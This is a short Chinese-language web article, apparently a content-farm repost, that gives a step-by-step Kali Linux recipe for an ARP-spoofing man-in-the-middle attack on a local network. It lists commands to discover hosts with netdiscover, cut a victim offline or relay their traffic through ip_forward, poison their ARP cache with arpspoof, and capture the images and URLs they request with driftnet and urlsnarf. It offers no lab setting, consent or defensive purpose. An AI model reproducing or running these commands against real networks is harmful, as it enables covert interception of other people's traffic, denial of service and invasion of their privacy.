前言:
如今兄弟们对“kalitelnet嗅探”可能比较关切,看官们都需要学习一些“kalitelnet嗅探”的相关内容。那么小编也在网络上收集了一些关于“kalitelnet嗅探””的相关文章,希望姐妹们能喜欢,同学们一起来了解一下吧!1. 打开终端,数据命令ifconfig,获取本机ip和网卡信息,只需要ip和网卡信息;
2. 获取局域网内存活的主机信息:输入命令:netdiscover -i eth0 -r 192.168.0.1/24
3. 这里有两种方式,一种是断网,一种是不断网
(1) 断网的方式,可以使对方断网
A) 输入命令:echo 0 > /proc/sys/net/ipv4/ip_forward
B) 检查结果,如果为0,则为断网模式:cat /proc/sys/net/ipv4/ip_forward
(2) 不断网的方式,在对方不断网的情况下,进行网络请求信息获取
A) 输入命令:echo 1 > /proc/sys/net/ipv4/ip_forward
B) 检查结果,如果为1,则为不断网模式:cat /proc/sys/net/ipv4/ip_forward
C) 代理中转,将代理配置到本机,让流量从本机经过,则可以进行请求拦截;
输入命令:arpspoof -t 目标主机 目标网关 -i 网卡
如:arpspoof -t 192.168.1.2 192.168.1.1 -i eth0
D) 抓取对方请求的图片,,输入命令:driftnet -i 网卡 ;输入命令后如果成功给,则会弹出driftnet窗口,图片将在上面显示。
如:driftnet -i eth0
E) 抓取对方请求的网站,输入命令:urlsnarf -i 网卡
如:urlsnarf -i eth0
标签: #kalitelnet嗅探